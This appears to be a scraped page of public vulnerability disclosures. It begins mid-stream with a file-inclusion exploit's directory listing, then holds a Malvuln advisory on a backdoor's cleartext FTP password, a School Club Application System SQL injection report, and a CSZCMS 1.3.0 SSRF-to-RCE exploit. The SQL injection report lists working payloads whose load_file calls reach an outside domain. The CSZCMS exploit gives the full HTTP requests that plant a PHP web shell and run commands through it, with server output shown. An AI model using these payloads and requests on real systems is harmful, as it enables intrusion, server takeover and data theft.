/>04/08/2022 06:27 AM <DIR> ..<br />03/19/2021 01:17 PM 225 .htaccess<br />04/07/2022 10:03 AM 2,115 about.html<br />03/30/2022 04:31 PM 220 about.php<br />04/07/2022 03:56 PM <DIR> admin<br />04/08/2022 06:27 AM <DIR> assets<br />03/29/2022 04:17 PM <DIR> classes<br />04/07/2022 03:20 PM <DIR> clubs<br />04/07/2022 04:33 PM <DIR> club_admin<br />04/07/2022 02:39 PM <DIR> club_contents<br />03/30/2022 10:03 AM 1,297 config.php<br />04/07/2022 05:13 PM <DIR> database<br />03/30/2022 04:31 PM 256 home.php<br />03/29/2022 10:24 AM <DIR> includes<br />04/07/2022 03:18 PM 3,010 index.php<br />04/07/2022 09:35 AM 647 initialize.php<br />04/07/2022 08:18 AM <DIR> uploads<br />04/07/2022 10:03 AM 1,842 welcome.html<br /> 8 File(s) 9,612 bytes<br /> 11 Dir(s) 81,520,218,112 bytes free<br /> </div><br /><br />```<br /><br /><br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/3MbzZuQ.png<br />https://i.imgur.com/mqXb1Mc.png<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/e087725b01dded75d85a20db58335fa8.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Ptakks.XP.a<br />Vulnerability: Insecure Credential Storage<br />Description: The default password for the backdoor FTP is stored in cleartext within the ptakks.ini file.<br />Family: Ptakks<br />Type: PE32<br />MD5: e087725b01dded75d85a20db58335fa8<br />Vuln ID: MVID-2022-0537<br />Disclosure: 04/06/2022<br /><br />Exploit/PoC:<br />"ptakks.ini"<br /><br />[FTP]<br />servidor=192.168.18.125<br />puerto=21<br />usuario=usuario<br />password=password<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: School Club Application System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.07.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application<br /><br />## Description:<br />The `id` parameter appears to be vulnerable to three types of SQL<br />injection attacks.<br />The payload '+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'<br />was submitted in the id parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control and also of all<br />accounts on this system, also the malicious user can download all<br />information about this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: page=clubs/view_details&id=2'+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />OR NOT 2914=2914-- erOW<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: page=clubs/view_details&id=2'+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />OR (SELECT 2308 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT<br />(ELT(2308=2308,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VAfL<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=clubs/view_details&id=2'+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />AND (SELECT 8537 FROM (SELECT(SLEEP(5)))TWcu)-- jivn<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 8 columns<br /> Payload: page=clubs/view_details&id=2'+(select<br />load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''<br />UNION ALL SELECT<br />CONCAT(0x7176787a71,0x7468764e617048694a74717a4f53734a6956786e7a4a56774b48427a7645474c414847756f704641,0x717a6b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL--<br />-<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/lpwxr4)<br /><br /><br /></code></pre>
<pre><code># Title: CSZCMS V1.3.0 - SSRF To LFI To Rce<br /># Author: Hejap Zairy<br /># Date: 07.04.2022<br /># Vendor: https://sourceforge.net/projects/cszcms/files/install/<br /># Software: https://liquidtelecom.dl.sourceforge.net/project/cszcms/install/CSZCMS-V1.3.0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># 1 - step inject ssrf <br /># 2 - inject SSRF to LFI<br /># 3 - Inject SSRF to LFI to RCE put webshell config<br /><br />#vulnerability Code php<br />Needs more filtering commands<br /><br /><br />```<br />protected static $base64encodeSessionData = false;<br />protected $commands = array(<br /> 'abort' => array('id' => true),<br /> 'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),<br /> 'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),<br /> 'chmod' => array('targets' => true, 'mode' => true),<br /> 'dim' => array('target' => true, 'substitute' => false),<br /> 'duplicate' => array('targets' => true, 'suffix' => false),<br /> 'editor' => array('name' => true, 'method' => true, 'args' => false),<br /> 'extract' => array('target' => true, 'mimes' => false, 'makedir' => false),<br /> 'file' => array('target' => true, 'download' => false, 'cpath' => false, 'onetime' => false),<br /> 'get' => array('target' => true, 'conv' => false),<br /> 'info' => array('targets' => true, 'compare' => false),<br /> 'ls' => array('target' => true, 'mimes' => false, 'intersect' => false),<br /> 'mkdir' => array('target' => true, 'name' => false, 'dirs' => false),<br /> 'mkfile' => array('target' => true, 'name' => true, 'mimes' => false),<br /> 'netmount' => array('protocol' => true, 'host' => true, 'path' => false, 'port' => false, 'user' => false, 'pass' => false, 'alias' => false, 'options' => false),<br /> 'open' => array('target' => false, 'tree' => false, 'init' => false, 'mimes' => false, 'compare' => false),<br /> 'parents' => array('target' => true, 'until' => false),<br /> 'paste' => array('dst' => true, 'targets' => true, 'cut' => false, 'mimes' => false, 'renames' => false, 'hashes' => false, 'suffix' => false),<br /> 'put' => array('target' => true, 'content' => '', 'mimes' => false, 'encoding' => false),<br /> 'rename' => array('target' => true, 'name' => true, 'mimes' => false, 'targets' => false, 'q' => false),<br /> 'resize' => array('target' => true, 'width' => false, 'height' => false, 'mode' => false, 'x' => false, 'y' => false, 'degree' => false, 'quality' => false, 'bg' => false),<br /> 'rm' => array('targets' => true),<br /> 'search' => array('q' => true, 'mimes' => false, 'target' => false, 'type' => false),<br /> 'size' => array('targets' => true),<br /> 'subdirs' => array('targets' => true),<br /> 'tmb' => array('targets' => true),<br /> 'tree' => array('target' => true),<br /> 'upload' => array('target' => true, 'FILES' => true, 'mimes' => false, 'html' => false, 'upload' => false, 'name' => false, 'upload_path' => false, 'chunk' => false, 'cid' => false, 'node' => false, 'renames' => false, 'hashes' => false, 'suffix' => false, 'mtime' => false, 'overwrite' => false, 'contentSaveId' => false),<br /> 'url' => array('target' => true, 'options' => false),<br /> 'zipdl' => array('targets' => true, 'download' => false)<br /> );<br />```<br /><br />[+] Payload GET<br /><br />#l1_MGRheS5waHA= base64 decode 0day.php<br />#l3_Y3N6ZGVmYXVsdC9tYWluLnBocA base64 decode main.php<br /><br /><br />```<br />GET /cms/index.php/admin/filemanager/connector/?cmd=get&targets=http://127.0.0.1/cms/index.php/admin/filemanager/connector/?cmd=file&target=l1_MGRheS5waHA= HTTP/1.1<br />Host: 127.0.0.1<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=h0nht0te0u73bbvu8e12lt2bmvfbepfn<br />Connection: close<br /><br /><br />```<br /><br /><br />#Status: CRITICAL<br /><br />#Response <br />```<br />{"content":"data:image\/png;base64,PD89YCRfR0VUWzUxNV1gPz4NCg=="}<br /># <?=`$_GET[515]`?> decode base64 <br /><br />```<br /><br /><br /><br /><br /># Requests <br />```<br />POST /cms/admin/filemanager/connector/ HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 128<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://127.0.0.1<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://127.0.0.1/cms/admin/filemanager<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed<br />Connection: close<br /><br />cmd=put&target=l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA&encoding=UTF-8&content=%3C%3F%3D%60%24_GET%5B515%5D%60%3F%3E&reqid=18002b807a32<br />```<br /><br /><br /><br /><br /><br /><br /><br />#Response <br /><br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 07 Apr 2022 06:31:19 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-XSS-Protection: 1; mode=block<br />X-Frame-Options: SAMEORIGIN<br />X-Content-Type-Options: nosniff<br />X-Powered-By: PHP/7.4.27<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: max-age=3600, must-revalidate<br />Pragma: no-cache<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Set-Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed; expires=Thu, 07-Apr-2022 18:31:19 GMT; Max-Age=43200; path=/; domain=127.0.0.1; HttpOnly<br />Content-Length: 190<br />Connection: keep-alive, close<br />Content-Type: application/json; charset=utf-8<br /><br />{"changed":[{"isowner":false,"ts":1649313079,"mime":"text\/x-php","read":1,"write":1,"size":"17","hash":"l6_Y29uZmlnX2V4YW1wbGUuaW5jLnBocA","name":"config_example.inc.php","phash":"l6_Lw"}]}<br />```<br /><br /><br /><br /><br /><br /><br />#webshell<br /><br />```<br />GET /cms/config_example.inc.php?515=dir HTTP/1.1<br />Host: 127.0.0.1<br />Cache-Control: max-age=0<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: ar,en-US;q=0.9,en;q=0.8<br />Cookie: 9b9c96f47e485bdc8e5ec52af52e4f21_cszsess=pb61pkn5tmjqcl4h5ev9r69q8vbubqed<br />Connection: close<br /><br /><br />```<br /><br /><br /><br />#response <br /><br />```<br />HTTP/1.1 200 OK<br />Date: Thu, 07 Apr 2022 06:37:33 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-XSS-Protection: 1; mode=block<br />X-Frame-Options: SAMEORIGIN<br />X-Content-Type-Options: nosniff<br />X-Powered-By: PHP/7.4.27<br />Connection: keep-alive, close<br />Cache-Control: max-age=3600, must-revalidate<br />Content-Length: 1917<br />Content-Type: text/html; charset=UTF-8<br /><br /> Volume in drive C is OS<br /> Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\xampp\htdocs\cms<br /><br />04/07/2022 09:13 AM <DIR> .<br />04/07/2022 02:23 AM <DIR> ..<br />04/30/2019 05:29 PM 8,444 .htaccess<br />04/07/2022 09:13 AM <DIR> .quarantine<br />04/07/2022 09:13 AM <DIR> .tmb<br />04/07/2022 07:07 AM 8 127.0.0.1_csv_banner_mgt_20220407.csv<br />04/07/2022 07:14 AM 5,362 127.0.0.1_files_20220407.zip<br />04/07/2022 07:14 AM 54,888 127.0.0.1_photo_20220407.zip<br />04/07/2022 06:57 AM <DIR> assets<br />04/09/2018 03:34 PM 479 cache.config.inc.php<br />11/29/2021 07:40 AM 4,733 CHANGELOG<br />04/07/2022 06:55 AM 696 config.inc.php<br />04/07/2022 09:37 AM 17 config_example.inc.php<br />08/07/2018 05:18 AM 4,075 CONTRIBUTING.md<br />04/21/2021 07:01 AM 151,259 corecss.css<br />04/21/2021 07:01 AM 378,086 corejs.js<br />04/07/2022 06:57 AM <DIR> cszcms<br />06/28/2019 09:04 PM 166 devtoolsbar.config.inc.php<br />04/07/2022 06:55 AM 690 env.config.inc.php<br />04/07/2022 06:55 AM 269 htaccess.config.inc.php<br />06/28/2019 02:48 PM 11,526 index.php<br />04/07/2022 06:57 AM <DIR> install<br />01/28/2020 06:40 AM 3,439 LICENSE.md<br />04/09/2018 03:35 PM 336 memcached.config.inc.php<br />04/09/2018 03:34 PM 1,297 nginx_example.com.conf<br />04/07/2022 09:13 AM <DIR> photo<br />04/09/2021 09:52 AM 1,744 proxy.inc.php<br />11/11/2021 07:48 AM 1,868 README.md<br />04/09/2018 03:35 PM 496 redis.config.inc.php<br />11/11/2021 07:46 AM 520 SECURITY.md<br />04/07/2022 06:57 AM <DIR> system<br />04/07/2022 09:13 AM <DIR> templates<br /> 22 File(s) 630,398 bytes<br /> 10 Dir(s) 80,676,995,072 bytes free<br /><br />```<br /><br /># Description:<br /> the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems, potentially leaking sensitive data such as authorization credentials <br />to Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/pzWjkXI.png<br />https://i.imgur.com/xxjxnGk.png<br />https://i.imgur.com/S1F7MaJ.png<br />https://i.imgur.com/BwWTfYU.png<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>